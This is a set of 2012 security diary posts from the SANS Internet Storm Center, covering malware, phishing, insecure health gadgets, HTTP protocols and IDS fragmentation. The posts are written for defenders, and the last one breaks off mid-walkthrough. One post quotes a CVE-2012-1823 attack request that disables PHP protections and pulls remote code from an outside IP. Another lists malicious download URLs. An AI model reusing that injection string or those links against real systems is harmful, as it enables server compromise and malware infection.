Published: 2012-05-31

Why Flame is Lame

We have gotten a number of submissions asking about "Flame", the malware that was spotted targeting systems in a number of Arab countries. According to existing write-ups, the malware is about 20 MB in size and consists of a number of binary modules held together by a duct-tape script written in Lua. A good part of the malware's size is taken up by its Lua interpreter.

If you ever find something like that using Perl instead of Lua... maybe I did it. I love to tie together various existing binaries with Perl duct tape. However, I am not writing malware... and any serious commercial malware-writing company would probably have fired me after seeing this approach. Using Lua would probably not fare much better. "Real" malware is typically plugged together from various modules, but compiled into one compact binary. Pulling up a random Spyeye description [1] shows that it is only 70 kBytes in size, and retails for $500. Whatever government contractor put together "Flame" probably charged a lot more than that. As with most IT needs: if you run some government malware supply department, think about going COTS.

Of course, "Flame" is different because it appears to be "government sponsored". Get over it. Did you know governments hire spies? People who get paid big bucks (I hope) to do what can generally be described as "evil and illegal stuff". They have been doing that for pretty much as long as governments have existed, and McAfee may even have a signature for it.

We are getting a lot of requests for hints on how to detect that you are infected with Flame. Short answer: if you have enough free time on your hands to look for "Flame", you are doing something right. Take a vacation. More likely than not, your time is better spent looking for malware in general. In the end, it doesn't matter that much why someone is infecting you with the malware du jour. The important part is how they got in. They pretty much all use the same pool of vulnerabilities and similar exfiltration techniques. Flame is actually pretty lame when it comes to exfiltrating data, as it uses odd user-agent strings. Instead of looking for Flame: set up a system to whitelist user-agents. That way, you may find some malware that actually matters, and if you happen to be infected with Flame, you will see that too.
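A minimal sketch of that idea, scanning web server or proxy logs for user-agents outside an approved list (the log format, whitelist patterns and sample line below are illustrative assumptions, not from this diary):

```python
# Sketch: flag HTTP requests whose User-Agent is not on an approved whitelist.
import re

# Illustrative whitelist -- tune to the agents you actually expect to see.
ALLOWED = re.compile(r"^Mozilla/5\.0 |^Microsoft-CryptoAPI/")

def unusual_agents(log_lines):
    """Yield (client_ip, user_agent) for agents outside the whitelist.

    Assumes Apache combined log format, where the user-agent is the
    last quoted field on each line.
    """
    pat = re.compile(r'^(\S+) .*"([^"]*)"$')
    for line in log_lines:
        m = pat.match(line.strip())
        if m and not ALLOWED.search(m.group(2)):
            yield m.group(1), m.group(2)

sample = ['10.0.0.5 - - [31/May/2012] "GET / HTTP/1.1" 200 512 "-" "Flame-ish/1.0"']
print(list(unusual_agents(sample)))
```

Run against a day of logs, the short tail of unmatched agents is usually reviewable by hand, and that is where odd malware user-agents stand out.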

But you say: Hey! I can't whitelist user-agents! Sorry: you already lost. On a good note: scrap that backup system. All your important data is already safely backed up in various government vaults. (recovery is a pain though... )

Sorry for the rant. But I had to get it out of my system. Oh... and in case you are still worried... the Iranian CERT has a Flame removal tool [2]. Just apply that. I am sure it is all safe and such.

[1] http://www.symantec.com/security_response/writeup.jsp?docid=2010-020216-0135-99
[2] http://certcc.ir/index.php?name=news&file=article&sid=1894

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-31

NASA Man-in-the-Middle Attack: Why you should use proper SSL Certificates

A posting to pastebin [1], by a group calling itself "Cyber Warrior Team from Iran", claims to have breached a NASA website via a "man in the middle" attack. The announcement is a bit hard to read due to the broken English, but here is how I parse the post and the associated screenshot:

The "Cyber Warrior Team" used a tool to scan NASA websites for SSL misconfigurations. They came across a site that used an invalid, likely self-signed or expired, certificate. Users visiting this website would be used to seeing a certificate warning, which made it a lot easier to launch a man-in-the-middle attack. In addition, the login form on the index page isn't using SSL, making it possible to intercept and modify it unnoticed.

Once the attacker set up the man in the middle attack, they were able to collect username and passwords.

Based on this interpretation, the lesson should be to stop using self-signed or invalid certificates for "obscure" internal websites. I have frequently seen the argument that for an internal website it is "not important", "too expensive" or "too complex" to set up a valid certificate. SSL isn't doing much for you if the certificate is not valid: the encryption SSL provides only works if the authentication works as well. Otherwise, you never know whether the key you negotiated was negotiated with the right party.

And of course, the login form on the index page should be delivered via SSL as well. Even if the form is submitted via SSL, it is subject to tampering if it is delivered via HTTP instead of HTTPS.

Good old "OWASP Top 10"-style lessons but, sadly, we still need to repeat them again and again. For a nice test to see if SSL is configured right on your site, see ssllabs.com [2].
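For a quick scripted check of a single host, something along these lines works in present-day Python (the function name and hostname handling are my own illustration, not from the post; `ssl.create_default_context` verifies both the chain and the hostname):

```python
# Sketch: does this host present a certificate a normal client can validate?
import socket
import ssl

def cert_is_valid(host, port=443):
    """Return True if a fully verified TLS handshake with host succeeds."""
    ctx = ssl.create_default_context()  # enables chain + hostname verification
    try:
        with socket.create_connection((host, port), timeout=10) as sock:
            with ctx.wrap_socket(sock, server_hostname=host):
                return True
    except (ssl.SSLError, ssl.CertificateError, OSError):
        # Self-signed, expired, or wrong-name certs all land here.
        return False
```

A self-signed or expired certificate fails this check exactly the way it fails in a user's browser, which is the point: if your own tooling can't validate the cert, neither can your users.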

Also, in more complex environments, you need to make sure that all of your SSL certificates are in sync. We recently updated our SSL certificates and forgot to update the one used by our IPv6 web server (thanks, Kees, for pointing that out to us).

[1] http://pastebin.com/MFPMGZ4Z

[2] https://www.ssllabs.com

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-31

SCADA@Home: Your health is no secret no more!

One of my recent interests has been what I call "SCADA@Home". I use this term to refer to all the Internet-connected devices we surround ourselves with. Some may also call it "the Internet of devices". In particular for home use, these devices are built to be cheap and simple, which hardly ever includes "secure". Today, I want to focus on a particular set of gadgets: healthcare sensors.

Like SCADA@Home in general, this part of the market has exploded over the last year. Internet-connected scales, blood pressure monitors, glucose measurement devices, thermometers and activity monitors can all be purchased for not too much money. I personally consider them "gadgets", but they certainly have some serious healthcare uses.

I will not mention any manufacturer names here, and I have anonymized some of the "dumps". The selection of devices I have access to is limited and random, and I do not want to create the appearance that these devices are worse than their competitors. Given the consistent security failures, I consider them pretty much all equivalent. Vendors have been notified.

There are two areas that appear to be particularly noteworthy:

- Failure to use SSL: many of the devices I looked at did not use SSL to transmit data to the server. In some cases, the website used to retrieve the data had an SSL option, but it was outright difficult to use. (OWASP Top 10: Insufficient Transport Layer Protection)

- Authentication flaws: devices use weak authentication methods, like a serial number. (OWASP Top 10: Broken Authentication and Session Management)

First of all, there are typically two HTTP connections involved. The first is used by the device to report data to the server; in some cases, the device may also retrieve settings from the server. The second HTTP connection is from the user's browser to the manufacturer's website and is used to review the data. The data submission typically uses a web service, and the websites themselves tend to be Ajax/Web 2.0 heavy, with the associated use of web services.

The device is typically configured by connecting it via USB to a PC or to a smartphone. The smartphone or desktop software provides a usable interface to configure passwords, a problem common, for example, among Bluetooth headsets, which don't have this option. Most of the time, the data is not sent from the device itself, but from a smartphone or desktop application: the device uploads data to the "PC", and the PC then submits the data to the web service. This should provide access to the SSL libraries available on the PC. In a few cases, the device sends data directly via WiFi. In the examples I have seen, these devices still use a USB connection for configuration from a PC.

Example 1: "Step Counter" / "Activity Monitor"

The first example is an "activity monitor". Essentially a fancy step counter. The device clips on your belt, and sends data to a base station via an unspecified wireless protocol. The base station also doubles as a charger. The user has no direct control over when the device uploads data, but it happens frequently as long as the device is in range of the base station. Here is a sample "POST":

POST /device/tracker/uploadData HTTP/1.1
Host: client.xxx.com:80
Content-Length: 163
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=1A2E693AD5B28F4F153EE9D23B9237C8
Connection: keep-alive

beaconType=standard&clientMode=standard&clientId=870B2195-xxxx-4F90-xxxx-67CxxxC8xxxx&clientVersion=1.2&os=Mac OS X 10.7.4 (Intel%2080486%10)

The session ID appears to be inconsequential, and the only identifier is the client ID. Part of the request was obfuscated with "xxx" to hide the identity of the manufacturer. The response to this request:

<?xml version="1.0" ?> 
<xxxClient version="1.0"> 
<response host="client.xxx.com" 
          port="80" secure="false"></response>
<device type="tracker" pingInterval="4000" action="command" >
<remoteOps errorHandler="executeTillError" responder="respondNoError"> 
<remoteOp encrypted="false">

It is interesting how some of the attributes in this response suggest that there may be an HTTPS option: port="80" and secure="false" in the response element may indicate that an encrypted transport exists but is not being used.

Example 2: Blood Pressure Sensor

The blood pressure sensor connects to a smartphone, which then collects the data and communicates with a web service. The authentication looks reasonable in this case. First, the smartphone app sends an authentication request to the web service:

GET /cgi-bin/session?action=new&auth=jullrich@sans.edu&hash=xxxxx& 
  duration=60&apiver=6&appname=wiscale&apppfm=ios&appliver=307 HTTP/1.1

The "hash" appears to be derived from the user-provided password and a nonce that was sent in response to a prior request. I wasn't able to directly work out how the hash is calculated (which is a good sign) and assume it is a "Digest-like" algorithm. Based on the format of the hash, MD5 is used as the hashing algorithm, which isn't great, but I will let it pass in this case.
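For illustration, a digest-like construction might look like the sketch below. The exact formula is my assumption (the vendor's real scheme was not reverse engineered); the point is that only a hash of the password plus a per-session nonce crosses the wire, never the password itself:

```python
# Sketch of a "digest-like" authentication hash: MD5 over the account name,
# a server-supplied nonce, and an MD5 of the password. Illustrative only --
# NOT the vendor's actual algorithm.
import hashlib

def auth_hash(email, password, nonce):
    """Return a hex digest binding the credentials to this session's nonce."""
    pw_digest = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5(f"{email}:{nonce}:{pw_digest}".encode()).hexdigest()
```

Because the nonce changes per session, a captured hash can't simply be replayed later, which is why this part of the design "looks reasonable" even though everything else travels in the clear.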

All of this still happens in clear text, and nothing but the password is protected. The server returns a session ID that is used for authentication going forward. The blood pressure data itself is transmitted in the clear, using proprietary units, but I assume that once you have a range of samples, it is easy to derive them:

action=store&sessionid=xxxx-4fc6c74e-0affade3&data=* TIME unixtime 1338427213
* ID mac,hard,soft,model
02-00-00-00-xx-01,0003000B,17,Blood Pressure Monitor BP
* ACCOUNT account,userid
* BATTERY vp,vps,rint,battery %25
* RESULT cause,sys,dia,bpm
* PULSE pressure,energy,centroid,timestamp,amplitude

(Some values are again replaced with "x". In case you wonder... my BP was a bit high but OK ;-)

In my case, the device sent a total of 12 historic values in addition to the last measured value. So far, I had only taken 12 measurements with the device.

Associated web sites

The manufacturers of both devices offer websites to review the data. Both use SSL to authenticate, but later bounce you to an HTTP site, adding the possibility of a "Firesheep"-style session hijacking attack. For the blood pressure website, you may manually enter "https" and it will "stick". The activity monitor has an HTTPS website, but all links will point you back to HTTP. A third device, a scale, which I am not discussing in more detail here as it is very much like the blood pressure monitor, suffers from the same problems.

A quick summary of the results:

  Device                 Authentication        Data Encryption  Website Auth SSL  Website Data SSL
  Blood Pressure Sensor  encrypted password    none             login only        only if user forces it
  Activity Monitor       device serial number  none             login only        hard for user to force

I have no idea whether HIPAA or other regulations would apply to data and devices like this. Like I said, these are "gadgets" you would find in a home, not in a doctor's office. The scale mentioned above used decent authentication but no SSL. If you have any devices like this, let me know how they authenticate and/or encrypt.

So how bad is this? I doubt anybody will be seriously harmed by any of these flaws. This is not like the wireless insulin pumps or infusion drips that have been demonstrated to be weak in the past. However, it does show a general disrespect for the privacy of the user's data, and an unwillingness to fix easy-to-fix problems.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-30

It's Phishing Season! In fact, it's ALWAYS Phishing Season!

It's always great to hear from our readers. We just got this note in from Tom on a phish he recently encountered:

One of my followers on Twitter (whose account was likely hacked or fell victim to this scam) sent me the following DM:

hilarious pic! bit.ly/KIbUqq

That bit.ly URL redirects to:

That site is clearly impersonating the Twitter.com site, and attempts to trick users into typing in their username and password.  As of this writing (May 30, 2012 12:18pm EDT), the site is still available.

The whois record shows it as registered to "XIN NET TECHNOLOGY CORPORATION" in Shanghai, China.  The whois record also has an HTML "script" tag in it, which may be an attempt to XSS users of web-based WHOIS services (though I did not try loading the JS file to find out).

While I've certainly seen reply spam on Twitter, I don't recall ever seeing this type of DM spam leading to phishing before.  I thought that you guys might find it interesting!

I sent a message using Twitter's online support form, and I also submitted the URL to Google's SafeBrowsing list.


This was just too good an example to pass up writing about.  Things to watch out for:

  • Any link you're asked to click on, in any context, is a risk - READ THE UNDERLYING LINK to verify that you're going where you think you are.
  • If it's a shortened link (bit.ly or whatever), check it with a sacrificial VM or from a sandboxed browser that you trust is actually partitioned and "safe".
  • Before you click the link - READ THE LINK AGAIN - the "vv" instead of a "w" character in "twitter" is a nice touch, and easy to miss.
  • Finally, before clicking the link, DON'T CLICK THE LINK.  Cut and paste it into your browser rather than clicking it directly.
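The "vv"-for-"w" trick above lends itself to a quick heuristic check. A minimal sketch (the folding rules and function below are my own illustration, not a real phishing-detection library):

```python
# Sketch: flag hostnames that imitate a brand name via simple character
# substitutions, e.g. "tvvitter.com" using "vv" in place of "w".
def looks_like(brand, host):
    """True if host resembles brand after folding common lookalike tricks,
    but is not actually the brand's own name."""
    folded = (host.lower()
              .replace("vv", "w")   # vv -> w
              .replace("rn", "m")   # rn -> m
              .replace("0", "o")    # zero -> o
              .replace("1", "l"))   # one -> l
    return brand in folded and brand not in host.lower()

print(looks_like("twitter", "tvvitter.com"))  # True: lookalike flagged
print(looks_like("twitter", "twitter.com"))   # False: the real domain passes
```

Crude as it is, a check like this over your outbound DNS or proxy logs catches exactly the class of typo-squat this phish relied on.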

If you've got any other pointers, or if I've missed anything, please use our comment form to... well... comment!


Rob VandenBrink


Published: 2012-05-30

What's in Your Lab?

The discussion about labs got me thinking about what we all have in our personal labs.  The "What's in your lab?" question is a standard one that I ask in interviews; it says a lot about a person's interests and commitment to those interests.

I just revamped my lab (thanks to my local "cheap servers off lease" company and eBay).  Previously I was able to downsize and host my entire lab on my laptop with a farm of virtual machines and a fleet of external USB drives, but as I ramped up my requirements for permanent servers (an MS Project server, an SCP server, a web honeypot and an army of permanent, CPU- and memory-hungry pentest VMs), I had to put some permanent hosts back in.

So to host all this, I put in 3 ESX servers with 20 cores altogether (thanks, eBay!).  I picked up a 4 Gb Fiber Channel switch and 4 HBAs for a song, also on eBay.  I had an older Xeon server with lots of drive bays, so I filled it up with 1 TB SATA drives and a SATA RAID controller - with a Fiber Channel HBA and Openfiler, I've now got a decent Fiber Channel SAN (with iSCSI and NFS thrown in for good measure).  Add a decent switch and firewall for VLAN support and network segmentation, and this starts to look a whole lot like something useful!  The goal was that after it's all bolted together, I can do almost anything in the lab without physically being there.

I still keep lots of my lab on the laptop VM farm - for instance, my Dynamips servers for WAN simulation are all still local, as are a few Linux VMs that I use for coding in one language or another.

Enough about my lab - what's in your lab?  Have you found a neat, cheap way of filling a lab need that you think others might benefit from?  Do you host your lab on a laptop for convenience, or do you have a rack in your basement (or at work)?  Please use our comment form and let us know!

Rob VandenBrink


Published: 2012-05-30

Too Big to Fail / Too Big to Learn?

There's an interesting trend that I've been noticing in datacenters over the last few years.  The pendulum has swung towards infrastructure that is getting too expensive to replicate in a test environment. 

In years past, there may have been a chassis switch and a number of routers.  Essentially these would run the same operating system with very similar features that smaller, less expensive units from the same vendor might run.  The servers would run Windows, Linux or some other OS, running on physical or virtual platforms.  Even with virtualization, this was all easy to set up in a lab.

These days though, on the server side we're now seeing more 10Gbps networking, FCoE (Fiber Channel over Ethernet), and more blade type servers.  These all run into larger dollars - not insurmountable for a business, as often last year's blade chassis can be used for testing and staging.  However, all of this is generally out of the reach of someone who's putting their own lab together.

On the networking side things are much more skewed.  In many organizations today's core networks are nothing like last year's network.  We're seeing way more 10Gbps switches, both in the core and at top of rack in datacenters.  In most cases, these switches run completely different operating systems than we've seen in the past (though the CLI often looks similar).

As mentioned previously, Fiber Channel over Ethernet is being seen more often - and as the name implies, FCoE shares more with Fiber Channel than with Ethernet.  Routers are still doing the core routing services on the same OS that we've seen in the past, but we're also seeing lots more private MPLS implementations than before.

Storage, as always, is a one-off in the datacenter.  Almost nobody has a spare enterprise SAN to play with, though it's becoming more common to have Fiber Channel switches in a corporate lab.  Not to mention the proliferation of load balancers, web application firewalls and other specialized one-off infrastructure gear that is becoming much more common these days than in the past.

So why is this on the ISC page today?  Because in combination, this adds up to a few negative things:

  • Especially on the networking and storage side, the costs involved mean that it's becoming very difficult to truly test changes to the production environment before implementation.  So changes are planned based on the product documentation, and perhaps input from the vendor technical support group.  In years past, the change would have been tested in advance and likely would have gone live the first time.  What we're seeing more frequently now is testing during the change window, and often it will take several change windows to "get it right".
  • From a security point of view, this means that organizations are becoming much more likely to NOT keep their most critical infrastructure up to date.  From a Manager's point of view, change equals risk.  And any changes to the core components now can affect EVERYTHING - from traditional server and workstation apps to storage to voice systems.
  • At the other end of the spectrum, while you can still cruise eBay and put together a killer lab for yourself, it's just not possible to put some of these more expensive but common datacenter components into a personal lab.

What really comes out of this is that without a test environment, it becomes incredibly difficult to become a true expert in these new technologies. As we make our infrastructure too big to fail, it effectively becomes too big to learn.  To become an expert you either need to work for the vendor, or you need to be a consultant with large clients and a good lab.  This also makes any troubleshooting more difficult (making managers even more change-averse).

What do you think?  Have I missed any important points, or am I off base?  Please use our comment form for feedback!

Rob VandenBrink


Published: 2012-05-29

Speeding up the Web and your IDS / Firewall

HTTP as a protocol has done pretty well so far. Initially intended to be a delivery medium for scientific data and documents, HTTP has become "The Web / The Internet" for most people and the content being transmitted via HTTP has changed a lot from its initial days.

There are two limitations in particular that some modern proposals attempt to overcome:

- Request-based nature of HTTP: the server is not able to notify the client of new data.
- Latency: HTTP uses pretty extensive headers and requires a full connection setup, which isn't exactly latency friendly.

Google in particular has put out a number of proposals to address some of these challenges:

1 - Sending HTTP request data on SYN

The TCP RFC has always allowed sending data on the SYN, but nobody really attempted to do it... ever. A standard HTTP request is typically a couple of hundred bytes in size. It is unlikely to get fragmented, and it would make sense to send it as part of the SYN packet, removing the overhead (in particular latency) caused by first properly establishing the TCP connection. The full 3-way handshake will easily add 100 ms to a new connection, even on a well-connected server.

However, if you have ever done any kind of IDS work, the idea of sending data on SYN probably doesn't sound all that comforting, and I would assume that many firewalls/IPSs/IDSs will not allow data on SYN to pass unnoticed.

2 - Compressing HTTP headers / SPDY

Most browsers support compressing the HTTP body. However, they do not currently support compressing HTTP headers. A proposal to frame HTTP requests called "SPDY" (pronounced "speedy") includes, among other features, the ability to compress HTTP headers. This should be particularly interesting for asymmetric Internet connections with little upstream bandwidth.
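To get a feel for the potential savings, here is a quick experiment compressing a typical request-header block with zlib (SPDY's header compression is zlib-based; the header text below is illustrative, not a real capture):

```python
# Sketch: how much do typical HTTP request headers shrink under zlib?
import zlib

headers = (b"GET / HTTP/1.1\r\n"
           b"Host: example.com\r\n"
           b"User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
           b"Accept: text/html,application/xhtml+xml\r\n"
           b"Accept-Language: en-us\r\n"
           b"Accept-Encoding: gzip, deflate\r\n"
           b"Cookie: JSESSIONID=1A2E693AD5B28F4F153EE9D23B9237C8\r\n"
           b"\r\n")

compressed = zlib.compress(headers, 9)
print(len(headers), "->", len(compressed), "bytes")
```

Repetitive tokens ("Accept-", "deflate", the cookie name) compress well, and SPDY does even better by keeping a shared compression context across requests, so repeated headers cost almost nothing after the first request.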

SPDY in itself is probably worth a future diary, as it provides a lot more than just compressed headers. It is implemented (but turned off by default) in recent versions of Chrome and Firefox. Twitter has started using SPDY, as has Google on select pages. Interestingly, SPDY is currently only used over SSL.

3 - Websockets

Websockets (in addition to SPDY) are an attempt to allow the web server to notify the client about new events. Think about web mail or instant messenger software notifying you of a new message. The WebSockets specification had a rough start, but was finalized last November. It is starting to see some use on social networking websites.
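As a small concrete piece of the protocol, here is the Sec-WebSocket-Accept computation from the finalized specification (RFC 6455): the server proves it understood the upgrade request by hashing the client's key together with a fixed GUID.

```python
# The Sec-WebSocket-Accept derivation from RFC 6455: SHA-1 over the
# client's Sec-WebSocket-Key concatenated with a fixed GUID, base64-encoded.
import base64
import hashlib

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

def accept_key(sec_websocket_key):
    """Compute the Sec-WebSocket-Accept value for a handshake response."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode()).digest()
    return base64.b64encode(digest).decode()

# The example key/accept pair from the RFC itself:
print(accept_key("dGhlIHNhbXBsZSBub25jZQ=="))  # s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
```

After this handshake, the connection stops being HTTP at all, which is one reason WebSocket traffic deserves its own inspection rules on an IDS.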

4 - Speed + Mobility

Microsoft came up with its own proposal: Speed + Mobility. So far, I am not aware of any implementations of it, and since it directly competes with SPDY, it may be pre-empted by it.

Looking further ahead: all of this (SPDY, S+M...) may ultimately become HTTP 2.0, which is specifically going to address the performance issues that SPDY and S+M are trying to solve.

[1] http://googlecode.blogspot.com/2012/01/lets-make-tcp-faster.html
[2] http://dev.chromium.org/spdy/spdy-whitepaper
[3] http://blogs.msdn.com/b/interoperability/archive/2012/03/25/speed-and-mobility-an-approach-for-http-2-0-to-make-mobile-apps-and-the-web-faster.aspx


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-05-27

PHP vulnerability CVE-2012-1823 being exploited in the wild

Reader Bob spotted the following string in his web server's access log:

bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

This string is an attempt to exploit the PHP vulnerability CVE-2012-1823 using the remote code execution variant. Let's look at what each of the invoked options means:

  • safe_mode=off: disables PHP's check that the owner of the current script matches the owner of the file being operated on by a file function. This directive was deprecated in the PHP 5.3.0 tree and removed in the PHP 5.4.0 tree.
  • disable_functions=null: no functions are disabled at all, which means insecure functions such as proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec are available. For more information on these functions, please check the PHP manual.
  • allow_url_fopen=on: allows PHP to open files located at HTTP or FTP locations and operate on them like a normal file descriptor.
  • allow_url_include=on: allows PHP code located at an HTTP or FTP URL to be included in a PHP file before it is processed and executed.
  • auto_prepend_file=<url>: includes the PHP code located at the given URL (in this request, http://81.17.24.82/info3.txt) and executes it before the code inside index.php.
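If you want to hunt for this pattern in your own access logs, a quick sketch could look like the following (my own heuristic, not an official signature; the detection regex is an assumption based on the "?-d" option-injection shape of the request above):

```python
# Sketch: flag access-log lines whose query string smuggles php-cgi "-d"
# directives (the CVE-2012-1823 exploitation pattern).
import re
from urllib.parse import unquote

def is_php_cgi_attack(request_line):
    """True if the requested URL carries php-cgi option injections like ?-d..."""
    m = re.search(r'"(?:GET|POST) (\S+)', request_line)
    if not m:
        return False
    # Attackers URL-encode '=' etc., so decode before matching.
    query = unquote(m.group(1))
    return bool(re.search(r'\?-[ds]', query))

log = '"GET /index.php?-dsafe_mode%3dOff+-dallow_url_include%3dOn HTTP/1.1"'
print(is_php_cgi_attack(log))  # True
```

Anything this flags deserves a close look: a "-d" at the start of a query string has no legitimate reason to be there.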

You can prevent this by using the latest stable PHP version, located on the downloads page. If you are using Windows, please be careful, because you can also be affected by CVE-2012-2376. For more information on remediating that vulnerability, please check my previous diary about it.

Have you seen logs like these in your web server's access.log? We want to hear about it. Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail:msantand at isc dot sans dot org


Published: 2012-05-26

New e-mail scam targeting Colombian Internet users: This time claiming to be from the Transport authority

Scams keep coming! This time, many users from all across the country were targeted by an e-mail scam claiming to be a traffic ticket notice from the Transport Authority.


Initial e-mail scam

Two links were provided in the e-mail: http://www.mcc-instrumentation.com/videos/Ver_Documento_ID_23452345212234_VER_Cod_2345234723497.html and http://www.la-cloture-electrique.fr/upload/Ver_Documento_ID_23472893475987980798072344_VER_Cod_2234523345234723497.html. Both of them redirect to the file Aviso-Multas_DOC.exe, with MD5 d554f70ce28470350269d8e6778127e3. Once executed, it downloads the following files:

File     MD5
atu.exe  1466d43e8ae62af74a83eb81094c7c25
ky.exe   974f4ceaca680fe4572a0e050fc851db
wrm.exe  e63c7844a75df064d78f1894e6f673bb

The exe files read all the TCP/IP registry parameters. After that, they connect to several servers, reporting to some kind of botnet:

Botnet Report

One of the reports seems to be sent by e-mail, because the PHP script the program reports to produces a warning:

As of today, other servers have removed the offending PHP scripts and send a 404 error to the program. In that case, no further action is taken by the program, and it becomes resident by creating entries under HKLM\Software\Microsoft\Windows\CurrentVersion\Run.

Have you seen this kind of traffic in your network? Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail:msantand at isc dot sans dot org


Published: 2012-05-25

Technical Analysis of Flash Player CVE-2012-0779

The Microsoft Malware Protection Center (MMPC) posted a technical analysis of malware targeting an Adobe Flash Player vulnerability (CVE-2012-0779) for which Adobe released a critical patch earlier this month (diary posted here [1]). The analysis shows how the infection occurs when a malicious document is opened; it is posted here [2]. Get the latest version of Flash Player here [3] (earlier versions of Flash Player are vulnerable).

[1] http://isc.sans.edu/diary/Adobe+Security+Flash+Update/13129
[2] http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx
[3] http://get.adobe.com/flashplayer/


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-05-25

Google Publishes Transparency Report

Google just released its transparency report [1], disclosing data going back to July 2011. As an example, the report shows, for the past month, the number of URL removal requests it received (1,255,402), the number of targeted domains (24,374), copyright owners (1,314) and reporting organizations (1,099). The full report is available here [1]. A blog post by Fred von Lohmann, Google's Senior Copyright Counsel, is available here [2].

[1] http://www.google.com/transparencyreport/removals/copyright/
[2] http://googleblog.blogspot.ca/2012/05/transparency-for-copyright-removals-in.html


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-05-24

ISC Feature of the Week: Country Report


As promised in the Data/Reports feature diary, this week we cover the Country Report page at https://isc.sans.edu/countryreport.html in detail. The Worldmap graphic on this page is used in numerous spots around the site and, in most cases, links back here.


Worldmap - https://isc.sans.edu/countryreport.html#worldmap

  • Summary graph color coded with legend by port
  • Grouped and graphed by percentage (%)

Country Statistics - https://isc.sans.edu/countryreport.html#statistics

  • Link to the Country Report page, which lists countries individually, as well as other features worthy of their own feature diary.
  • To view summary data for a specific country, select a country name from the drop-down and click Submit.
  • Summary table of country name, country flag, additional information and data submitted through our sensors.

How to read this table / FAQs - https://isc.sans.edu/countryreport.html#faq

  • Detailed explanation of the Statistics table above and where certain information is pulled from.


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu


Published: 2012-05-23

Problems with MS12-035 affecting XP, SBS and Windows 2003?

There is a fair amount of chatter in Microsoft forums regarding problems caused by recent Microsoft patches.  [1][2][3][4] From what I can gather, users are repeatedly being prompted to reinstall 3 older .NET patches on some OS distributions.   It looks like MS12-035 was intended to replace 3 older patches (MS11-044, MS11-078 and MS12-016) and something isn't quite right.   You may want to hold off deploying that patch until we know more.

Thanks to Dave (ToyMaster) for the heads up and the hard work researching the issue.  I think he has a blog post pending [5] that will explain the issue in more detail.   I'll keep you updated here as I learn more.

Do you have any more information for us?   Leave me a comment or contact us via the handler contact page.

Mark Baggett




[1] http://social.technet.microsoft.com/Forums/en-US/smallbusinessserver/thread/2f0bbb7d-fc28-4c32-bf63-54cf5a6615d2

[2] http://social.technet.microsoft.com/Forums/en-US/itproxpsp/thread/c7934c6f-0acd-4793-b222-e840eb61b3a6

[3] http://msmvps.com/blogs/bradley/archive/2012/05/21/hang-loose-until-someone-in-redmond-wakes-up-and-fixes-microsoft-update.aspx

[4] http://answers.microsoft.com/en-us/windows/forum/windows_xp-windows_update/kb2633880-kb2518864-kb2572073-installed-but-not/e6ecef19-5551-4925-9d74-43813ba04d3a

[5] http://home.comcast.net/~itdave/site/





Published: 2012-05-23

IP Fragmentation Attacks

Using overlapping IP fragments to avoid detection by an IDS has been around for a long time, and we know how to solve this problem.  The best option, in my opinion, is to use a tool such as OpenBSD's pf packet filter [1] to scrub our packets, eliminating all the fragments (pfSense [2] makes this easy to deploy).  However, this option is not without its caveats [3].  You could simply configure your IDS to alert on and/or drop any overlapping fragmented packets; overlapping fragments should not exist in normal traffic.   Another option is to configure the IDS to reassemble packets the same way the endpoint reassembles them.  Snort's frag3 preprocessor will reassemble packets based on the OS of the target IP and successfully detect any fragmented attack that would work against a given target host.  Problem solved, right?  Not quite: attackers can still use differences between fragmentation reassembly engines to their advantage.  What happens when the IDS analyst turns to a full packet capture to understand the attack?  If the analyst's tools reassemble the packets differently than the target OS, the analyst may incorrectly dismiss the TRUE positive as a FALSE positive.

Today, with the low cost of disk drives, more and more organizations can afford to maintain full packet captures of everything that goes in and out of their network. If you are not running full packet capture, you really should look into it. I don't think there is a better way to understand attacks on your network than having full packet captures. One great option is to install Daemonlogger [4] on the Linux/BSD distribution of your choice. This was an option I used for many years. Today, I use the Security Onion distro [5] by Doug Burks. If you want a free IDS with full packet capture that you can quickly and easily deploy, Security Onion is a great option.

Once you have the full packet capture, how do you find the fragmented attacks? You could try reassembling them with Wireshark. Let's check that out and see what happens. Security Onion has scapy installed, so let's use that to generate some overlapping fragments. I'll generate the classic overlapped fragment pattern illustrated by the paper “Active Mapping: Resisting NIDS Evasion Without Altering Traffic” by Umesh Shankar and Vern Paxson [6] and then further explained in “Target Based Fragmentation Assembly” by Judy Novak [7].

Now open up our "fragmentpattern.pcap" with Wireshark and see what we see.

